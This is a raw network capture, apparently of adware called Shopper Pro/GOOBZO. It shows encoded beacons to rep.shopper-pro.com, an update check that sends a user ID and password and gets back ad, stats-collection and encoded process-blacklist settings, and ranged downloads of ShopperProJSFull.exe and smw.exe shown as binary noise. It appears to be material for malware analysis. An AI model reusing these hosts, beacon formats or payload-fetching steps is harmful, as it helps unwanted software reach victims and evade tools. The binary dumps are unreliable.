    GET /app/ping.ashx?e=K24uUiBczqc4DPBd3om9l6G6A4KkaYqgTEgCpOx0T0GQL2F0hg1RiVC6b dx5TQKxdj9frAO5TaGZ4n6lxkuym3bGUKC6SiUtYRRGpvjKZmzjXrgYJQKsUCndBhIJGn5Gl3VMfCFqNT669uXeODcaV gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFDMWtlnh6ykc2DJ5K4X8Fo xaJ0pFBf0UClEX4xyKyvfczJCAMREbP9pGE7GNaKd5p59GYA8 MxkEchBIBSL pnq6LeO//ew/cRstaZMh7oc9Jm6LOUplLi9UaJ0lDNBvBxfXneO6iyXLvPTXiM8YeL1JXfzjhvHW HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: rep.shopper-pro.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:41 GMT
    Content-Length: 0
    ....



    GET /app/ping.ashx?e=XOxRKBm2zlwfJBuEXOGPjV6COREN73glt8f6YpiR28IQ9XpMu3JNON2W/aep YyrKB9qcQmkVohnIGJDPNlC0ZmJRQOaX BegJHDf/u7xkS731F411UHVh6RoJ10TU0sX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8UMxa2WeHrKRzYMnkrhfwWj7FonSkUF/RQKURfjHIrK99zMkIAxERs/2kYTsY1op3mnn0ZgDz4zGQRyEEgFIv6merot47/97D9xGy1pkyHuhz0mbos5SmUuL1RonSUM0G8HF9ed47qLJcu89NeIzxh4vUld/OOG8dY= HTTP/1.1

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: rep.shopper-pro.com
    Connection: Keep-Alive


    HTTP/1.1 200 OK
    Cache-Control: private
    Server: Microsoft-IIS/7.5
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Wed, 04 Jun 2014 18:54:41 GMT
    Content-Length: 0


    GET /online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=335e88be-0c5e-4ba6-851b-e652ba3e6ba3&Password=oCQOL84Q&OS=5&V=3.3.9.4&VS=1&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&XMLVersion=20131113143800&UpdateReason=0&resver=1.0.0.8&VA_Aff=NONE&XMLUpdateFailed=0&ElapsedTime=1401908134&SBPIDS=1 HTTP/1.0
    User-Agent: CoreWinInet
    Host: online.GOOBZO.com
    Pragma: no-cache
    Cookie: ASP.NET_SessionId=gyq3hm5555rtu045g05eee55


    HTTP/1.1 200 OK
    Connection: close
    Date: Wed, 04 Jun 2014 18:55:38 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    X-AspNet-Version: 2.0.50727
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Content-Length: 547
    <RESULT>.<LICENSE><STATUS>YaBhX1FVSUY=</STATUS>
    ;<EXPIRATION>0</EXPIRATION></LICENSE><UPDATE>.
    <EXIST>0</EXIST>.<VERSION></VERSION>.<PAGE_
    URL></PAGE_URL>.<DOWNLOAD_URL></DOWNLOAD_URL>.<
    ;DOWNLOAD_FILENAME></DOWNLOAD_FILENAME>.</UPDATE>.<S
    TATS><COLLECT>1</COLLECT></STATS>..<ADS><
    ;SHOW>1</SHOW></ADS>...<BLACKLIST>..<LEN>10
    8</LEN><DATA>..Y3JzcztzdmNob3N0O0FjdFNhZ2UuZXhlO2NkYXNmLmV
    4ZTt3bGlkc3ZjLmV4ZTt3bGNvbW0uZXhlO2FnZW50LmV4ZTtBU0MuZXhlO3N1bXAuZXhlO
    0F1ZGlhbHMuZXhlO1RlYW1WaWV3ZXI7..</DATA></BLACKLIST>....&l
    t;SENDLOGRULE>..1..</SENDLOGRULE>...</RESULT>...


    GET /ShopperProJSFull.exe HTTP/1.1
    Range: bytes=250000-499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2bt1dcmxj05l2.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 28 Apr 2014 16:17:28 GMT
    Last-Modified: Mon, 28 Apr 2014 14:06:17 GMT
    ETag: "b284dd3a8425b05805d7f1a9c12291d1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 250000-499999/2328584
    Age: 25641
    X-Cache: Hit from cloudfront
    Via: 1.1 9ce63d3af60e77462dfef1ebe1eea8f0.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: a9JLcnArHhc_3oFAOSOUMjtElSqumiR6CbDnIJAjWzyX5Qs-K5xmkQ==
    HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
    Content-Length: 250000..Connection: keep-alive..Date: Mon, 28 Apr 2014
    16:17:28 GMT..Last-Modified: Mon, 28 Apr 2014 14:06:17 GMT..ETag: "b2
    84dd3a8425b05805d7f1a9c12291d1"..Accept-Ranges: bytes..Server: AmazonS
    3..Content-Range: bytes 250000-499999/2328584..Age: 25641..X-Cache: Hi
    t from cloudfront..Via: 1.1 9ce63d3af60e77462dfef1ebe1eea8f0.cloudfron
    t.net (CloudFront)..X-Amz-Cf-Id: a9JLcnArHhc_3oFAOSOUMjtElSqumiR6CbDnI
    JAjWzyX5Qs-K5xmkQ==....~..6......-......3..b...qQ<...0../.I..^..}.*
    .R..$?bMM....(......v..... U@g].H..........G..$....?.a.?....?Cw.E..x.n
    .._.n).]....-.'6...5W]w.X...H....{j.....eHb...R.?.eB..Q.U.]. E...&....
    z..&V?..:...E.#[email protected].,l.g.c..w...P.Ud.....*v......@.............
    ....SYd..|yn~uK.......<c.Z|.. ...|..a~..o.*t.......bB......H....S.
    v. ....I.z2..6......#.0...../mGnc%v.e..c.....j....p.=`[email protected].
    g...g..........EZp.. ..*......,..u....An.sL......F.....gG.y.3...).]...
    h.h...q..>....E...p\J.4.|..`.U..".Iu....js..f=...[q.s.v9..F(.ajI2..
    ..M...!.7W9R..Q...4qY...Qo#..[>..GD.......Z.W..../...i..;......h...
    .._NU. xS3....ER .n..?.Q3..o}....E).3.`.?.|}..;@X...B*7....._..'f.7...
    .t..f.m.%m...R$8...t ....R..M. ..K......p...`............e!R.. ....c.E
    ..{ZQ..O(X..{...~.~..1..J.....j..k.......D...x^....B\.....= G...DP4..P
    .Z..-.j..kV..#2.L.1*.l./Z_K.4d^.m.J,...}'...... .E0...ub*..B.....K..QR
    ...4c......Fx..A.......i@.*..5DKevC.%J`hCF...tV/.;.....MD>.{....DF.
    ..R.......d.....U.\*.}[email protected]]......<.Z.T...Z.......c

    <<< skipped >>>

    GET /ShopperProJSFull.exe HTTP/1.1

    Range: bytes=1250000-1499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2bt1dcmxj05l2.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 28 Apr 2014 16:17:28 GMT
    Last-Modified: Mon, 28 Apr 2014 14:06:17 GMT
    ETag: "b284dd3a8425b05805d7f1a9c12291d1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1250000-1499999/2328584
    Age: 25648
    X-Cache: Hit from cloudfront
    Via: 1.1 9ce63d3af60e77462dfef1ebe1eea8f0.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: cpL5xfdk3vuwm9HgUaKYo7oveRQlYt_IOhbO3isQUuA4iGrJUq9wQQ==
    ...1....n%J.8?.<...D....P.3i(.y;..G.;|jq...N.K......H..bN..=..=a..M
    .d....M%]t.1.^..q...b..............$.zLxa....<t,w[v.Sa.G .R.Qm.j.!h
    .....I.."...s..../....9....3......c.f....*...i..l..>^.......M......
    .v 5Df.>[w,T.v.E.s$...wa..O].(!..e.`[email protected].!qx..._".uV.#r.&
    gt;vmShh...... ......H....E..m..u7>.......{E.....t.....Y.Li...... w
    ...sz....8..j?...a.<$.l...........f\b..X.d..Hx.....)......U........
    ...D.....FL..a^vB..X.../.$..N9.....*........\..al.......w........}.N..
    .77...Q...........>..SL.N........Q...6...]........Fv....O..n...5h..
    [email protected]<..m)P..;.'.;r,.V..h........Oe.2.b.P.
    *........#(;%.K.Y|...x....:W[..Z......d...kE$.nz..T5...Pc9&H.>M....
    .k.73..J......;1....S>.N......!... ..>,y...B2...J...m..2M.......
    ?8z...|.v/xPF..LO.c..d...{.W...VP>[email protected]).'..y....3....N..gS..
    KB88...a....5./...$...:T...}..j.....a.....[.....x.AJ...WngC...d.L..b..
    ..M...~.@zEgyW....=.{$.h.6S...D&..X............R7.w.HZ.tE..y{fb.ps.M&l
    t;.e.".rRY..2.....!d.m..:n4C.......^...[s....YO;.*...{.{.....{.1....=.
    I....A.}..<...^..4....!yLF.O0.......F...o...b.w!...!...F....Z.2....
    [email protected]. d.a..'..r]/....w.a[f...g..M..f.F8:.%Yy.........ZC. .&g
    t;......[...b...."bV...l;<`VaK.q..qz..$...E.C.|.d.Z.A].r8o....V....
    @.i..;Y.n#e..n.%`...6n#k.........]t.`...1rf.........k..u...l.D.*2Bj.;.
    ~.....n]~....~.D7.O..Ve...e~e ...N...XOa][email protected]..>
    0...S.U...s....EK,[email protected]|&.3.=..% ./[email protected].".
    d.`..FCFO...i....W).J..j...s....i:U..O8.6}.....?.....x..ks,.. 0F.y

    <<< skipped >>>

    GET /ShopperProJSFull.exe HTTP/1.1

    Range: bytes=2000000-2249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2bt1dcmxj05l2.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 28 Apr 2014 16:17:28 GMT
    Last-Modified: Mon, 28 Apr 2014 14:06:17 GMT
    ETag: "b284dd3a8425b05805d7f1a9c12291d1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2000000-2249999/2328584
    Age: 25653
    X-Cache: Hit from cloudfront
    Via: 1.1 9ce63d3af60e77462dfef1ebe1eea8f0.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: Z1gju3YUytlhvlgCDfb377aFRK-tIHf1n4YDUssMWmLRhccgulMbcg==
    ...".E.....3....b..*4..k`.0M....G2o. .....M..V.o#W0|..t.d^.S...B..O.GH
    .....Y10j*....ei.....~..J../.......C.BC1.?.(:5............x.......;VQ'
    ...*.P .U..6...=Jc....6x...d..."f..OB./.L.."S......q RL2......v..S....
    ..vq7.O.....*.s..7.....H.....u.%U.l<D.^...:.Jm.fo.H.S......3Xh.#d..
    7.s.:.p......|.EY..i.]..g.5=.#.,SW..\.....%D.!.....{......u(p.......=.
    .......Ij...}.J......b.....W3..p.AWd3...?.B#.. ..0B........\...(..._.'
    ^3.<..lA..By...Ke.2]..Q....sf...w..vtK.....`....`S.x.;..;v.O...l...
    ..?.L.NV..=.0..wd...)..f...UI.8 o....D....|.C9 9..$...OD..uh.....9.p.z
    {..y/.jn.R.IL".n>...`..K.~p..... ..b9... }g.......p....j.d;...&..?\
    z.\..w.Ua...FW7o!......B.3.A..N.....H6.j..e.....G.....A.0...Z.c.1.46..
    ._...]8..L}h...{.V....H*9.7...%........K.K>L...&...~.........j.[..^
    .E.r.iE.T;<2=...l(3U..9.N.l..r.'...Rv......y.kc.n..`...........Vf..
    (.].....Z.7.Z..................b.K.][email protected].....".s....#..R\..
    U.........s.ZAib..d.xWX....-.....r...P.......?..V.y.H.X,G.E....V......
    ....7..;....`...y.....]UY*J..z...B7......8.g......2.-?!f.se,.....D.8..
    PC.M..R8..(......Y.SI.i......!..pUK...<. .ye.)V....,.. ..P.4....5$.
    ..tu.........V&|E.u..B..%.?]..E...5.!...`...LxS...",#(.R...y...~9.b.$9
    ..x....^.....l.,Q..t{..VP...3.}/r.7.L....u$-..s'.t.L*..z&.z..fv......r
    f,...c...m..?.p....&.W....j...s.....?....E..Z....H.a.o.\.Q......@6....
    ..b...3.o.......D....}k.H#...R.Dw.B....n.^..M.........xl.6w...y.{.K>
    ;..<...W.3!... ....3.h.81.].a#LZ(.O...*[....k.6.l....m.]?.....L.F..
    Oo..k...........#.........z....7}.=Q.l;I..aR..V.[yY.$....b........

    <<< skipped >>>

    GET /smw.exe HTTP/1.1
    Range: bytes=250000-499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 250000-499999/5194096
    Age: 69503
    X-Cache: Hit from cloudfront
    Via: 1.1 47e639ad8407cd7c97cf6a61427833e0.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: xZBHRlnI9ezML1gVPHFzWsXCMagoGcGopQjgUImeCuhDDvPd9i5nIA==
    .c....x.`@.T*........rd.&. ...xm...U~......!....ef_..E...:........k7J%
    .?.S|R ...&....^.S%....r...T.5(.......oU&c_.!..uP.%...l...X"b..P......
    ...*{...fA"...s........#."[email protected]..>...../C..._...z...g..i..d.... ..
    ..!.6%..J....N..7 ..Y..W/..X.._;.zq.$..2.q..e.]..7.1..n.L.,oF.8...%.I.
    ..D./.7...J..,.....=..?..FR..d...k..1T\>.6}.hDe|Gv..F..8...z....&..
    N.....t.....8.......!...k.m.byn.....6.k8.#8..#w..........n..0.....~!..
    .z9..W......n q.....z.......Y.*.I..k.dP..J......h.y....y......K."X?...
    Cg....k..u.j4Ab.!.0...a.....s.7p.}.....;.S...J..8<;7.......<...]
    I*UJ.x.3I...9.T.|L\.J.L.z..0.]..!...=r[.....'n.o...7?........[.;q.@...
    eD... ..vV.4Ugii^....5z....,..'-....B./:..W..GF3.;]....O?.)...n..3..X.
    $X;.a..a.}'..x.`..a%....9.C\..?....^t....8..;.hL.c.........{..u.$.."gZ
    U..h}(^...m..n..Do.#..!......K5......|...bfA.>.(..Pi.f.p&A3........
    ..C....YHk.Y.....:o.A.C7......yW.[.9K>..l.~..o#.T`.....S....y&....&
    KK.nZ....e..oV.7..o6.7.=y...:%.*.f....:[.b...J.TW...fi.).%.I.....W....
    ......y..u..lh-......lU...g.8.dh.r$N?/.V..D.r.....y........y.....kS.f^
    v7..eS#..'.4/...yI..#>f.~^:.jj^......[.y.V$.ey.9...<..zh..;V?/O.
    e.E....'..)......=....N.y.....K.I..||..e.I.....y.t.y9..~^b.hj^.K......
    ..(....ur.=..}.:m^*Z..e.Z6I..W...o..o.........W......C.5D....n.....n..
    -....>.56.6.B...).....]u.4..iC............-..(..W..Fy...Z..e..K..2.
    ....n.Z....i...|#..."C.,.3]......O'S!..R....5....*......d.j..hSw......
    ..KG.A..R;.t...v...3..........~.([..;:u.|.....k...n...D..~.....] :..?u
    ..Q..e....|..N6.=y..%.......0$!R..T...m)"...YC.....>G"t....5...

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=750000-999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 750000-999999/5194096
    Age: 69508
    X-Cache: Hit from cloudfront
    Via: 1.1 47e639ad8407cd7c97cf6a61427833e0.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: Hfqo0MJJ3hW5IiwTaC7_D7CYwBJV5co6ILcm6-8arI922ZlvlllyfA==
    O-.. /l?.z.|...g.v.a..........{..x..P.....bx.\.'.....'.?/d.f.8.{...0|i
    ..G.2...H....,8f.m....".l..b-kxK........|...g...Y.H.....qf.....Ub...,.
    ...P.<.../u7..o..xa.*..7..x...............r....w\ ...M.~..w..)...*.
    .v....k....8.....7O.^..i.)'.0.|x..Sh.hW..T..xa.../>.~...g....G..o."
    |.~w...}!..Cr. l~)...q..m.y..N../|...Ga..9/..`.r[.....,..^i..p..6<.
    .E.....,...9....u....Uxa...C..vB.X.p6......~..nT.....1./<w....../..
    ..!..l{.".8.}.....4.........c. .H..j.....8...(./..m...p.........\..Z..
    .?..m....H...Xv....:s).....G^....Exa.|...Y.b.=....n..\....[l...T...7..
    ..lp ....G ?^8.6....G-....w...............^...A.E..M.G./..M..}.~.^..za
    [email protected]..$\.t!u./.K..Y..W...A..1.:L.!Ob...^.-<......ZF....(
    N.,\.brL...A......3x.P.....>G;......q.~.6q. .....u#../..V..#^..>
    x....r.........Q/........./s|........l...6...h.m.0.6.x.F../|u...^8.c..
    .?..>..z....\...R7....0.......8<.s..^....{..h:^8.......d.....=^.
    .e......C....u....r.g....uxa...WxaO../<.-.{...%..Z?P?....1.....'...
    ._..._...{........~..s..........:.}0.....s~.]...."... .o'..^.....pZz..
    ...<.n..J>xa..vC.4..y.p.............J..~.......?$....B8.!...a)*.
    ...h.a9......xaC....mPg.../C..p.QifG...o.Mx..h.>.S.N....Q....[2?...
    .E.A....6~...gh5^...4...OEa......S.l..y4....s...ax..0lv..C..t...8.<
    ..,..W.....#../|..\ }4....m.~.R/<...^x%.w....M....../.....[...[.e..
    N.4.:E......OFK..s.B...4......m...'..(...].v{....qxC[.C..vvY7l..<gY
    7...O..^.....:.1.i..6].^.pL.....7...<......;..])K..^.:..peW..Q...zE
    .q...y......3..z.........{.GH.......#.x-.w<..."..p.........B...

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=1250000-1499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 1250000-1499999/5194096
    Age: 69510
    X-Cache: Hit from cloudfront
    Via: 1.1 47e639ad8407cd7c97cf6a61427833e0.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: PkeT1l3XckOPfJeoGWLEydCN0yxk_MWIMqMEZX9fB984QyK2N65-wQ==
    .#5.1.....#}.9..D|....H.3......R.2....di.....D..\......}..X-.....)....
    .x.&./......l<.z|\x...m...t..ol..A.....*.9.Q..-..K..Z......b..d....
    ...@.;...-.Q.u&.Ey.Y.>.M:...?{.....wA={.I...."@.V........bH........
    (.........hm.....C....ON6..D.S:.Z.xUW..Y.<]-..*...&k.t..$.ZQ....$k}
    .%...r...t....&q.X..{L.........6..9.L .>w...62.bc. -=P...V..<...
    ...o.I.........uu...W%.}......|[email protected]....
    .}}...v../..%......`..........-!!4...C.'...o.....%....tw...3........`.
    [email protected]..~.!.....*...([email protected].../..
    ...=.*3....,.zJ......G..mH....L.Z....-.....\....%.m...^[..^G...O..S...
    J.....V......,.kF......h..B..xJ..~........G.C......C.V...#K.B.....(..|
    W#..*#.U..l.U......z.....j.@G..]....93Xk..>.....I....J..H.....rB...
    .........}y.a<....^u......#.....;..W....x...WE&.....N....I.#=......
    .........Y.....:WhT`w`.q.HF1..4#......P...#.........i.3K.....1.......b
    .8.8V..*.z..FrH\4,rH.aL...^.....s:.........#........T...B3..l......[.F
    ..}v.Fo|....]LO.....5._o..^Wc.....%...k..6.?.)...i-.cq.......L]#..$4..
    S....-..L.. ......X......Y.Ml..m2... f...z..ZX..v.#..1.x_-}..t.W7..sl.
    .......S.....po......%.k.....H..-.B..R.bi.1....4.'x.p.k..- ..f.oB~.Np.
    ;r..*3.u.Q.dB...X...OQ...%-<X^#_K..u/.^.]..vK...w.&.....s0.......jK
    `n........h...Y...lN...r'...../C.81._,;....V.Ee....... ..\TF....\.....
    ....C.......o...4../1#..-8^....v.fUC....9.,. [email protected]..
    u........Z3..0B..y...wy.q........h..%.f<......``/.a^0.........mw...
    ..[o...,..|9......;....@n..^...,s.i.%-....&5....n.....)p....nq...~

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=2000000-2249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 2000000-2249999/5194096
    Age: 69516
    X-Cache: Hit from cloudfront
    Via: 1.1 47e639ad8407cd7c97cf6a61427833e0.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: uAULNnHrvy-P1Bov79yXEZquDQXmUjXudwlCjzs2x6urkpoImQuxxQ==
    -.kX.......yA..t.........A..>..wHP...8O.N.....r...r.......1}......%
    }.......B|..a....P~.fL..B..H....4.......nk..L.YA.....X..}8.....Fm.a...
    .......>.f}....L..b...A..b.......)> &..~....J.....T....P.>.C5
    .....e.#av.ZS....zuA.F..bJ.....Y...!.a.:..8..JG...aL..:9.......F6.u&..
    ......m..}../.T....>..P.c:......../} ....Z...".C.......s..I..O..t].
    ...Z...9.bV..n..#../J43f.......>0.....5..4..">..g...C.Z.....0},5
    3=.".>..%....C^.s.]g.N.. .@...|.....PE0j...(....>....A7.K...f...
    .5..a........).c.]:....T?mb.u...._...D....*}."5.....Y....$..SL..,..#5.
    .G.g.......L..PA$..7f.(.dz8...!.=>...;.HX.]g....."[email protected]..
    :.cP.[.....K.t.....k..j1_....2......XJ....I-.O..v]...z.w...s|J.OO...j.
    .x,.L3......a...%J..[..D.O....b........2}dE1=..b....>..8....D...N..
    [email protected]......(.P.}[email protected]....{...>........lW....
    ^.F.b.c........HZ.J&.p.L....d...K...N0.`./f)...$[.Qs..R.."..D.B.qO..&.
    r%GO.3....7...pw..75.uf...L.4.I.>.2....D!.:.'..(.;...u..^.1.....k..
    j1_C..........RA........LO..!b.....l..s....k `..E.d....M"...G........M
    .......A .#4.q...)>..ga.S..T....n..S...b.BH^W..#....@.]g....C..z...
    .9...:W7.@...]Z ....p.|....K?t...c.U..Ty.........qA? .r)_......y>..
    .#.V.1....8...........qnb.M.9.V.t..._UL<T3...$.... ..........D`....
    .y..0.......0.....#@..n{....q..h`C..P...F;...P.....0..;d..../.xL.A/..f
    z...5|.z......z.,.9|i..#...........*N..pS...O...q(............8zqp.?9.
    ...~J..r...J.~..Ov...Wj?920.mO:..2...........v{.J.A~_...t.I\=..D..|..N
    .!..n....l._...g.{=Z..*:...!4.M.....t.... ....9..k........-c.M....

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=2500000-2749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 2500000-2749999/5194096
    Age: 69520
    X-Cache: Hit from cloudfront
    Via: 1.1 47e639ad8407cd7c97cf6a61427833e0.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 6_p2SbpscQtmRaS1PRhUa_G0NlOnOza4QLT8FOLCOjbUmdFuy7LPBA==
    ....]g/...*.fV.......qZ..T.[R.4...V..3...>F}...n....(.P(.!.(...Na3.
    ^.mc1LP.........H&........8......9../.j..2n.._.....{......._...h,.`>
    ;..K......e4...\y..I.4....rp.....?.S.p.......d.|^M...x.f...3YV.e.^E..b
    ...|_.q.gN.>..........<..9. ..mV.{...8.e..R.........4;#eET4.z...
    ...}..[...S..... ...i.`.P.._..9..C.J.=b..D.....Y.K..77.=..}.c..E...9..
    ...A}...O.kH\[#.#.J*7<........M..'L.<........r...o.k1F..j...=.=}
    .>.....Nl<F..G;."..J.....N..n 2..>1..#...q..=.....}P._u.a.S.5
    ...a5.....=>=..@...[......8....k........G.....n..........].....B.)J
    ^5....df.'G.\..U.W...XN..h.......Q....O;.C.....a9W.......9t59........w
    M...CO..........f.wE.......sW. ..*.._..q"..k..rV...~....VM.rgh\..q'.W.
    ..w....&...B.............J..s...^..8...............5....:G.kY.y.....UJ
    ..a....r....`.P.tO.....bYe}...Fpw^..))......e.u...O.2p2.R....W.o '.A..
    .......z...J.\..Q.<2...8.....\.>C....SF..Y..).....[h..*..E).....
    .F....G.od..o..].....VVh#..j.....|~....(.X.e.x(7....bd..~.Z.......J2.=
    ......j{.SC.Q......|..u.<.. T...=^........{...}.g1..N..Dz.7)......!
    .m..)tP.L.....p2."..L..g.>y....J.."|.... .P.&j4.D.......46..'*.`oW.
    . GI..N./.v...X.*).T..99.X. .!Up.(.. .U...Na...9.t'S.K.......T~X.H..(.
    L...p..~..|Y.p........x>......._S..^.... <[email protected]..%........N*
    .T...5%.e.......T...^|^.....^.....=..]QQ.....|.c..2d..m.kg.i.<./..$
    I...txP~.xx)tm][email protected].[...[..!.8..x.o.......tN.w.....V{.
    .:.|.u:'..I=..m..=..................Ox..u-..K..]ct.]........N..gDx....
    ...bu<.......j.EW......@.......=..|N|.;ZG,.q...a....(<.C[".V

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=3000000-3249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Last-Modified: Tue, 27 May 2014 14:13:42 GMT
    Accept-Ranges: bytes
    ETag: "6c8a3addb579cf1:0"
    Server: Microsoft-IIS/7.5
    X-Powered-By: ASP.NET
    Date: Tue, 27 May 2014 23:32:52 GMT
    Content-Range: bytes 3000000-3249999/5194096
    Age: 69524
    X-Cache: Hit from cloudfront
    Via: 1.1 47e639ad8407cd7c97cf6a61427833e0.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: V05Dhw0wQlW7EksW583UfpWIxdD86jdMcNRbePnJao4MVblM5mc4iA==
    .}...WoA,'[email protected];...6I...K..0.=].9.....H`.............v.....Y....
    .......=......i'[email protected];.e.:....B
    .!..O..P..ga...} [email protected].#E.C.3?C..c..2u.U..._Y3.'....s..
    ....d.A.....f....[......:...M...0@>(/..>[email protected]
    ..D.........T.DUu.v...5Q...u......qf..F7....._.....H..w.......LK.....d
    .Wg...?..3......$.R..mS..]...)[email protected].....<0...
    ..y.ya....4|v..{.g.'k3..<..%....;.e.BY.n...<n...qI...;.?.>...
    ii...C..... ..8..g..p.9..p.c......g.s..Qc]b.h/.-&.z.....\CR3[[email protected].
    .....-.B...`Zx..fB.....J....;R.8.FG`b!.kh.C...n.9..W,...........Vs....
    .........!....c..Z.2,6...j.M...t~......1n.V...nk..%p*.ju9J.^>.6.!8.
    .N.b........@ ..!....M....8..PQ.2...... b........b..Lk..>.w...o..`.
    ...t.i.M...@..]5..j^1j#..Tps.`...g.........O.......sq....,xZE..29..,..
    ps}.H.......v..h..$.....>..n....jC.s.6y..7..#..u...4. ...-V....N?..
    [email protected]|..1.1B.:...I.d.1N.KLm%.#..%...W....'...n..k.|...7..I.5....
    Ae....np'.Bj.p...d._Pi....j ....W.....0.R.9...S..<.X/.0.t...:..^..x
    ..,O.....4..@.....*.....[bb...$J...*}ST......$..4.j...}..w..%"P.......
    ../?..?.....s.`.de.^..g.5..p.,...a\.S...].......;i.t..I...DX.r........
    ........3.......>..;......Q..u{K..Y.r.$...[A............;...)e.T..9
    4`.;#d.R)b.. .}......SY...<....s.-...m.cD.....<u`..S.....1b7.*..
    0.C...7...:].C*..?MJ.al8_.7..M...z4.b..|y.J..........L.U../w;3.9..;...
    ..$E..<G.-....d;....CG..o..0B6..G .............F......*.....g......
    6...U.z.M..@\.1t .|..YO..<.{.n....4'&a0p .1|....2.-`H..a.b.^...

    <<< skipped >>>

    GET /smw.exe HTTP/1.1

    Range: bytes=3250000-3499999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d13s98z2lzti92.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
